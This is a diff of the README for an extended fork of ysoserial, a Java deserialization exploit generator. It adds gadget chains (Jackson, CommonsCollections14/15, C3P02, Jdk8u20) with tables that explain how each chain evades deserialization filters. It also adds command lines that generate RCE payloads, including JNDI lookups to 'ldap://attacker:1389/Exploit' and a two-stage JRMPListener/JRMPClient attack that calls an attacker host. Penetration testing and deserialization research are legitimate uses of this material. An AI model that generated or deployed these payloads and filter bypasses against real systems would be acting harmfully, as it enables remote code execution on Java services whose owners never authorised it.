@@ -1,7 +1,7 @@
 
 # ysoserial (extended)
 
-Fork of [frohoff/ysoserial](https://github.com/frohoff/ysoserial) with **20+ additional gadget chains** from academic papers (JDD, FLASH, GCMiner) and independent research. Focuses on filter-bypass entry points and JDK 17+ compatible sinks.
+Fork of [frohoff/ysoserial](https://github.com/frohoff/ysoserial) with **26+ additional gadget chains** from academic papers (JDD, FLASH, GCMiner), independent research, and automated fuzzer discovery. Focuses on filter-bypass entry points, cross-library evasion, and JDK 17+ compatible sinks.
 
 A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
 
@@ -17,10 +17,20 @@ Standard deserialization filters (JEP 290, custom `ObjectInputFilter`) typically
 |-------------|--------|-----------------|
 | `ConcurrentHashMap` | CC10, CC11, ROME4, Hibernate3, ROMEJndi | Rarely blocked — used extensively in JDK internals |
 | `TreeBag` | CB3 | CC4-specific class, not in standard filter lists |
-| `LinkedHashSet` | CC12, CC13 | Extends HashSet but class-level filters often miss it |
+| `LinkedHashSet` | CC12, CC13, CC15 | Extends HashSet but class-level filters often miss it |
 | `TreeSet` | Click2, BeanShell2 | Standard JDK class, never blocked in known filters |
-| `BadAttributeValueExpException` | ROME2 | JMX class, not commonly filtered |
+| `BadAttributeValueExpException` | ROME2, Jackson1, Jackson2 | JMX class, not commonly filtered |
 | `Hashtable` | ROME3 | Some filters miss this older Map implementation |
+
+### Filter-Bypass Sinks (InvokerTransformer Alternatives)
+
+`InvokerTransformer` is one of the most commonly filtered CC classes. These chains avoid it entirely:
+
+| Chain | Sink | How It Avoids InvokerTransformer |
+|-------|------|----------------------------------|
+| `CC14` | `InstantiateTransformer` → `TrAXFilter` → `TemplatesImpl` | Same package as InvokerTransformer, but rarely filtered |
+| `CC15` | Same as CC14 + LinkedHashSet root | Double evasion: root + sink bypass |
+| `CC13` | Cross-library CC4→CC3 + InvokerTransformer | Version-specific filters miss cross-library |
 
 ### JDK 17+ Compatible (No TemplatesImpl)
 
@@ -30,6 +40,7 @@ These chains work without `--add-opens java.xml` by using JNDI sinks instead of 
 |-------|------|-------|
 | `CommonsCollectionsJndi` | `InitialContext.doLookup()` | `java -jar ysoserial.jar CommonsCollectionsJndi 'ldap://attacker/Exploit'` |
 | `CommonsCollectionsJndi2` | CC4+CC3 cross-lib → `doLookup()` | `java -jar ysoserial.jar CommonsCollectionsJndi2 'ldap://attacker/Exploit'` |
+| `Jackson2` | `POJONode` → `JdbcRowSetImpl` → JNDI | `java -jar ysoserial.jar Jackson2 'ldap://attacker/Exploit'` |
 | `ROMEJndi` | `JdbcRowSetImpl` → JNDI | `java -jar ysoserial.jar ROMEJndi 'ldap://attacker/Exploit'` |
 | `CommonsBeanutilsJndi` | `JdbcRowSetImpl` → JNDI | `java -jar ysoserial.jar CommonsBeanutilsJndi 'ldap://attacker/Exploit'` |
 | `CommonsBeanutilsJndi2` | `JdbcRowSetImpl` → JNDI | CB + CC4 variant |
@@ -37,33 +48,67 @@ These chains work without `--add-opens java.xml` by using JNDI sinks instead of 
 | `CommonsBeanutilsH2` | `JdbcRowSetImpl` → H2 JDBC INIT | RCE via H2 SQL (requires H2 1.x on target) |
 | `WildFly1` | `InitialContext.lookup()` | Direct JNDI from `readObject()` — 120 bytes |
 
+### Jackson-databind Chains (NEW)
+
+Native Java deserialization chains using jackson-databind (one of the most common Java dependencies):
+
+| Chain | Discoverer | Sink | Description |
+|-------|-----------|------|-------------|
+| `Jackson1` | @Y4tacker, @mbechler | `TemplatesImpl` bytecode | `BadAttributeValueExpException` → `POJONode.toString()` → getter invocation → RCE |
+| `Jackson2` | @Y4tacker, @mbechler | `JdbcRowSetImpl` JNDI | Same trigger, JNDI sink — JDK 17+ friendly |
+
+### JDK-Only Chains (No Library Dependencies)
+
+| Chain | Discoverer | Target JDK | Description |
+|-------|-----------|------------|-------------|
+| `Jdk7u21` | @frohoff | JRE ≤ 7u21 | `AnnotationInvocationHandler` + hash collision → `TemplatesImpl` |
+| `Jdk8u20` | @pwntester, @mwulftange | JRE ≤ 8u20 | Bypasses 7u25 AIH fix via `BeanContextSupport` exception swallowing |
+| `JRMPClient` | @mbechler | All | JRMP outbound connection (use with `JRMPListener` exploit) |
+| `URLDNS` | @gebl | All | DNS lookup only (no RCE, useful for detection) |
+
+### Nested Deserialization Wrappers
+
+These bypass first-layer type filters by wrapping an inner payload:
+
+| Chain | Discoverer | Mechanism |
+|-------|-----------|-----------|
+| `SignedObjectWrap` | @BofeiC | `SignedObject` → nested `ObjectInputStream` |
+| `C3P02` | @mbechler | C3P0 `WrapperConnectionPoolDataSource` hex-encoded nested deser |
+
 ### Other New Chains
 
-| Chain | Description |
-|-------|-------------|
-| `ROME2` | ROME via `BadAttributeValueExpException` + `Unsafe.putObject()` (JDK 17 val field bypass) |
-| `ROME3` | ROME via `Hashtable` with manual Entry construction |
-| `GroovyGStr` | Groovy `GString` + `LazyMap` — no `AnnotationInvocationHandler` needed |
-| `HibernateCK` | Hibernate `CacheKey` entry (Hibernate 4.x only) |
-| `VaadinMP` | Vaadin `MethodProperty` → arbitrary getter invocation |
-| `SignedObjectWrap` | `SignedObject` wrapper — bypasses first-layer type filters |
-| `CommonsBeanutils3` | CB + TreeBag entry — bypasses PriorityQueue AND InvokerTransformer filters |
-| `CommonsBeanutils4` | CB + JdbcRowSetImpl JNDI sink — no TemplatesImpl, JDK 17+ compatible |
-| `Click2` | Apache Click via TreeSet entry — bypasses PriorityQueue filters |
-| `BeanShell2` | BeanShell interpreter via TreeSet entry — bypasses PriorityQueue filters |
-| `CommonsCollections13` | CC4 TiedMapEntry + CC3 LazyMap + LinkedHashSet — double evasion (cross-library + root bypass) |
-| `CommonsCollectionsJndi2` | CC4 TiedMapEntry + CC3 LazyMap + JNDI sink — cross-library filter evasion |
+| Chain | Discoverer | Description |
+|-------|-----------|-------------|
+| `ROME2` | @mbechler | ROME via `BadAttributeValueExpException` + `Unsafe.putObject()` (JDK 17 val field bypass) |
+| `ROME3` | @mbechler | ROME via `Hashtable` with manual Entry construction |
+| `GroovyGStr` | @BofeiC | Groovy `GString` + `LazyMap` — no `AnnotationInvocationHandler` needed |
+| `HibernateCK` | @BofeiC | Hibernate `CacheKey` entry (Hibernate 4.x only) |
+| `VaadinMP` | @BofeiC | Vaadin `MethodProperty` → arbitrary getter invocation |
+| `CommonsBeanutils3` | @BofeiC | CB + TreeBag entry — bypasses PriorityQueue AND InvokerTransformer filters |
+| `Click2` | @BofeiC | Apache Click via TreeSet entry — bypasses PriorityQueue filters |
+| `BeanShell2` | @BofeiC | BeanShell interpreter via TreeSet entry — bypasses PriorityQueue filters |
+| `CommonsCollections13` | @BofeiC | CC4 TiedMapEntry + CC3 LazyMap + LinkedHashSet — cross-library + root bypass |
+| `CommonsCollections14` | @zema1 | CC6 trigger + InstantiateTransformer sink — InvokerTransformer filter bypass |
+| `CommonsCollections15` | @zema1, @BofeiC | LinkedHashSet + InstantiateTransformer — double evasion (root + sink) |
 
-## All Payloads (67 total)
+### Exploit Tools
+
+| Tool | Author | Usage |
+|------|--------|-------|
+| `JRMPListener` | @mbechler | `java -cp ysoserial.jar ysoserial.exploit.JRMPListener <port> <payload> <cmd>` |
+| `RMIRegistryExploit` | @mbechler | `java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit <host> <port> <payload> <cmd>` |
+
+## All Payloads (73 total)
 
 ```
 Payload                Authors                                Dependencies
 -------                -------                                ------------
 AspectJWeaver          @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
-BeanShell2             @BofeiC                                bsh:2.0b5
 Atomikos               @pwntester, @sciccone                  transactions-osgi:4.0.6, jta:1.1
 BeanShell1             @pwntester, @cschneider4711            bsh:2.0b5
+BeanShell2             @BofeiC                                bsh:2.0b5
 C3P0                   @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
+C3P02                  @mbechler                              c3p0:0.9.5.2, commons-collections:3.1
 Ceylon                 @kai_ullrich                           ceylon.language:1.3.3
 Click1                 @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0
 Click2                 @BofeiC                                click-nodeps:2.3.0, javax.servlet-api:3.1.0
@@ -89,6 +134,8 @@ CommonsCollections10   @BofeiC                                commons-collection
 CommonsCollections11   @BofeiC                                commons-collections4:4.0
 CommonsCollections12   @BofeiC                                commons-collections:3.1
 CommonsCollections13   @BofeiC                                commons-collections:3.1, commons-collections4:4.0
+CommonsCollections14   @zema1                                 commons-collections:3.1
+CommonsCollections15   @zema1, @BofeiC                        commons-collections:3.1
 CommonsCollectionsJndi @BofeiC                                commons-collections:3.1
 CommonsCollectionsJndi2 @BofeiC                               commons-collections:3.1, commons-collections4:4.0
 FileUpload1            @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
@@ -98,11 +145,14 @@ Hibernate1             @mbechler                              hibernate-core:4.3
 Hibernate2             @mbechler                              hibernate-core:4.3.11.Final
 Hibernate3             @BofeiC                                hibernate-core:4.3.11.Final
 HibernateCK            @BofeiC                                hibernate-core:4.3.11.Final
+Jackson1               @Y4tacker, @mbechler                   jackson-databind:2.12.7.1
+Jackson2               @Y4tacker, @mbechler                   jackson-databind:2.12.7.1
 JBossInterceptors1     @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final
 JRMPClient             @mbechler
 JSON1                  @mbechler                              json-lib:2.4, spring-aop:4.1.4, commons-beanutils:1.9.2
 JavassistWeld1         @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final
 Jdk7u21                @frohoff
+Jdk8u20                @pwntester, @mwulftange
 Jython1                @pwntester, @cschneider4711            jython-standalone:2.5.2
 Jython2                @pwntester, @cschneider4711, @ykoster  jython-standalone:2.5.2
 MozillaRhino1          @matthias_kaiser                       js:1.7R2
@@ -161,17 +211,33 @@ java -jar ysoserial.jar CommonsCollections6 'calc.exe' > payload.bin
 # RCE via JNDI (JDK 17+ friendly, no TemplatesImpl)
 java -jar ysoserial.jar CommonsCollectionsJndi 'ldap://attacker:1389/Exploit' > payload.bin
 
-# Filter bypass: ConcurrentHashMap entry instead of HashMap/HashSet
-java -jar ysoserial.jar CommonsCollections10 'calc.exe' > payload.bin
+# Jackson-databind: POJONode → TemplatesImpl
+java -jar ysoserial.jar Jackson1 'calc.exe' > payload.bin
 
-# Cross-library evasion: CC4 TiedMapEntry + CC3 LazyMap (evades version-specific filters)
+# Jackson-databind: POJONode → JNDI (JDK 17+, no --add-opens needed)
+java -jar ysoserial.jar Jackson2 'ldap://attacker:1389/Exploit' > payload.bin
+
+# Filter bypass: InvokerTransformer → InstantiateTransformer (rarely filtered)
+java -jar ysoserial.jar CommonsCollections14 'calc.exe' > payload.bin
+
+# Double evasion: LinkedHashSet root + InstantiateTransformer sink
+java -jar ysoserial.jar CommonsCollections15 'calc.exe' > payload.bin
+
+# Cross-library evasion: CC4 TiedMapEntry + CC3 LazyMap
 java -jar ysoserial.jar CommonsCollections13 'calc.exe' > payload.bin
+
+# Nested wrapper: C3P0 hex-encoded second-order deserialization
+java -jar ysoserial.jar C3P02 'calc.exe' > payload.bin
 
 # Cross-library + JNDI sink
 java -jar ysoserial.jar CommonsCollectionsJndi2 'ldap://attacker:1389/Exploit' > payload.bin
 
 # Nested wrapper to bypass first-layer type filters
 java -jar ysoserial.jar SignedObjectWrap 'calc.exe' > payload.bin
+
+# Two-stage: send JRMPClient payload to victim, run listener to serve second stage
+java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 'calc.exe'
+java -jar ysoserial.jar JRMPClient 'attacker:1099' > payload.bin
 ```
 
 ### JDK 17+ Note
@@ -185,7 +251,7 @@ java --add-opens java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAM
      -jar ysoserial.jar ROME 'calc.exe' > payload.bin
 ```
 
-JNDI-based payloads (`CommonsCollectionsJndi`, `ROMEJndi`, `WildFly1`) do **not** need these flags.
+JNDI-based payloads (`CommonsCollectionsJndi`, `Jackson2`, `ROMEJndi`, `WildFly1`) do **not** need these flags.
 
 ## Examples
 
@@ -218,6 +284,7 @@ mvn clean package -DskipTests
 * [JDD (S&P 2024)](https://doi.org/10.1109/SP54263.2024.00188) — Automated gadget chain discovery
 * [FLASH (S&P 2024)](https://doi.org/10.1109/SP54263.2024.00189) — Filter-aware chain construction
 * [GCMiner (CCS 2023)](https://doi.org/10.1145/3576915.3616620) — Graph-based gadget chain mining
+* [Handcrafted Gadgets (Code White)](https://codewhitesec.blogspot.com/2018/01/handcrafted-gadgets.html) — Jdk8u20 chain analysis by @mwulftange
+* [marshalsec](https://github.com/frohoff/marshalsec) — Java deserialization research by @mbechler
 * [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
-* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
 * [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
